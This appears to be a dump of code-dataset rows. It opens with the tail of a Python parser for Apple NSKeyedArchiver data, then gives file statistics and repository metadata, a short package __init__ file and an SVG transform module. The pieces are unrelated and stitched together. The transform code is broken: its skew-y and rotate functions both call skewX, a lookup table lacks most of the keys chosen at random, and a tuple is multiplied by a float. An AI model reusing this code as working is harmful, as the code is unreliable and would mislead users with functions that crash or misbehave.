4: NSKeyedArchiveParser._process_ns_range,
# 12: 'NSEdgeInsets' https://github.com/apple/swift-corelibs-foundation/blob/master/TestFoundation/Resources/NSKeyedUnarchiver-EdgeInsetsTest.plist
}
special_type = d.get('NS.special')
if special_type: # NSSpecialValue
if special_type in ns_value_special_types:
return ns_value_special_types[special_type](self, class_name, d, objects_list, parents)
else:
logger.error("Unsupported NSValue special type {} in NSKeyedArchiver data, please report.", special_type)
else: # NSConcreteValue
logger.error("Unsupported NSConcreteValue type in NSKeyedArchiver data, please report.", special_type)
return None
def _process_ns_list_item(self, _class_name, d, objects_list, parents):
# TODO 'properties' is an NSDictionary
return {
'url': self.process_obj(d.get('URL', None), objects_list, parents),
'bookmark': self.process_obj(d.get('bookmark', None), objects_list, parents),
'name': self.process_obj(d.get('name', None), objects_list, parents),
'order': self.process_obj(d.get('order', None), objects_list, parents),
'uuid': self.process_obj(d.get('uniqueIdentifier', None), objects_list, parents)
}
def _process_ns_date(self, _class_name, d, _objects_list, _parents):
return parse_mac_absolute_time(d.get('NS.time'))
def _process_default(self, class_name, d, _objects_list, _parents):
logger.warning(
"Unknown NSKeyedArchiver class name {} with data ({}) in '{}', please report.", class_name, d, self.fullpath)
@classmethod
def get_processors(cls):
return {
'NSArray': cls._process_ns_sequence,
'NSAttributedString': cls._process_ns_attributed_string,
# 'NSCache'
# 'NSColor' simple sample: {'NSColorSpace': 3, 'NSWhite': b'0\x00'},
# 'NSCompoundPredicate'
'NSData': cls._process_ns_data,
'NSDate': cls._process_ns_date,
'NSDictionary': cls._process_ns_dictionary,
# 'NSError'
# 'NSFont' sample: {'NSName': 'Helvetica', 'NSSize': 12.0, 'NSfFlags': 16},
# 'NSGeometry'
# 'NSLocale'
'NSMutableArray': cls._process_ns_sequence,
'NSMutableAttributedString': cls._process_ns_attributed_string,
'NSMutableData': cls._process_ns_data,
'NSMutableDictionary': cls._process_ns_dictionary,
'NSMutableSet': cls._process_ns_sequence,
'NSMutableString': cls._process_ns_string,
# 'NSNotification' https://github.com/apple/swift-corelibs-foundation/blob/master/TestFoundation/Resources/NSKeyedUnarchiver-NotificationTest.plist
'NSNull': cls._process_ns_null,
# 'NSNumber'
# 'NSOrderedSet' https://github.com/apple/swift-corelibs-foundation/blob/master/TestFoundation/Resources/NSKeyedUnarchiver-OrderedSetTest.plist
# 'NSParagraphStyle' sample: {'NSAlignment': 4, 'NSTabStops': '$null'},
# 'NSPredicate'
# 'NSProgressFraction'
# 'NSRange'
# 'NSRegularExpression'
'NSSet': cls._process_ns_sequence,
'NSString': cls._process_ns_string,
'NSURL': cls._process_ns_url,
'NSUUID': cls._process_ns_uuid,
'NSValue': cls._process_ns_value,
'SFLListItem': cls._process_ns_list_item
}
def convert_dict(self, d, objects_list, parents):
if '$class' in d:
try:
class_name = self.process_obj(d['$class'], objects_list, parents).get('$classname')
return self.get_processors().get(class_name, NSKeyedArchiveParser._process_default)(self, class_name, d, objects_list, parents)
except (AttributeError, KeyError, ValueError):
pass
return d
def convert_string(self, obj):
if obj == '$null':
return None
return obj
| 45.72766
| 170
| 0.622557
| 10,577
| 0.984273
| 0
| 0
| 2,464
| 0.229295
| 0
| 0
| 3,451
| 0.321143
|
bb85cd6b9000d3cdaff7738f7a55a4fc05c3ab98
| 89
|
py
|
Python
|
guillotina_volto/blocks/__init__.py
|
enfold/guillotina-volto
|
d38ee300470c813c99341eaeb2ba8a2b5fb7d778
|
[
"BSD-2-Clause"
] | 5
|
2018-11-11T07:19:06.000Z
|
2020-01-18T11:04:15.000Z
|
guillotina_volto/blocks/__init__.py
|
enfold/guillotina-volto
|
d38ee300470c813c99341eaeb2ba8a2b5fb7d778
|
[
"BSD-2-Clause"
] | 4
|
2021-05-14T20:21:03.000Z
|
2021-11-18T01:27:04.000Z
|
guillotina_volto/blocks/__init__.py
|
enfold/guillotina-volto
|
d38ee300470c813c99341eaeb2ba8a2b5fb7d778
|
[
"BSD-2-Clause"
] | 2
|
2019-06-14T10:42:22.000Z
|
2020-05-09T13:09:09.000Z
|
from . import default # noqa
from . import types # noqa
from . import standard # noqa
| 22.25
| 30
| 0.696629
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 18
| 0.202247
|
bb86c442b96d2055b1909d4bb39b8d492cac5efe
| 1,131
|
py
|
Python
|
plotdotroot/plotdot/svgDraw/transform.py
|
hodeld/axidraw
|
b5009779d01f209b7fe712a92aa9c117ce32f70a
|
[
"MIT"
] | 1
|
2020-07-28T15:09:57.000Z
|
2020-07-28T15:09:57.000Z
|
plotdotroot/plotdot/svgDraw/transform.py
|
hodeld/axidraw
|
b5009779d01f209b7fe712a92aa9c117ce32f70a
|
[
"MIT"
] | 4
|
2021-04-08T21:33:10.000Z
|
2021-09-22T19:29:10.000Z
|
plotdotroot/plotdot/svgDraw/transform.py
|
hodeld/axidraw
|
b5009779d01f209b7fe712a92aa9c117ce32f70a
|
[
"MIT"
] | 1
|
2022-03-18T18:07:27.000Z
|
2022-03-18T18:07:27.000Z
|
import random
def scale(ele, sx, sy=None):
if sy is None:
sy = sx
ele.scale(sx, sy)
def translate(ele, sx, sy=0):
ele.translate(sx, sy)
def skew_x(ele, angle, sy=None):
ele.skewX(angle)
def skew_y(ele, angle, sy=None):
ele.skewX(angle)
def rotate(ele, angle, sy=None):
ele.skewX(angle)
_TRANSF_FN = {1: scale,
2: translate,
3: skew_x,
4: skew_y,
5: rotate,
}
_SCALE_TRANS = {1: (1, 1)}
def transform_random(svg_ele):
return svg_ele
def transform_cont(elemnts):
sx, sy = random.randint(1, 10), random.randint(1, 10)
trans_meth = random.randint(1, 4)
x_f, y_f = _SCALE_TRANS[trans_meth]
sx_b = sx * x_f
sy_b = sy * y_f
velo = 0.1 # float 0 ... 1
dispatch_fn = _TRANSF_FN
for k, ele in enumerate(elemnts):
(sx, sy) = (sx_b, sy_b) * (1 + k * velo)
dispatch_fn[trans_meth](ele, sx, sy)
sx_b, sy_b = sx, sy
def transform_allmeths(ele, trans_dic):
dispatch_fn = _TRANSF_FN
for k, (x, y) in trans_dic.items():
dispatch_fn[k](ele, x, y)
| 17.952381
| 57
| 0.568523
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 15
| 0.013263
|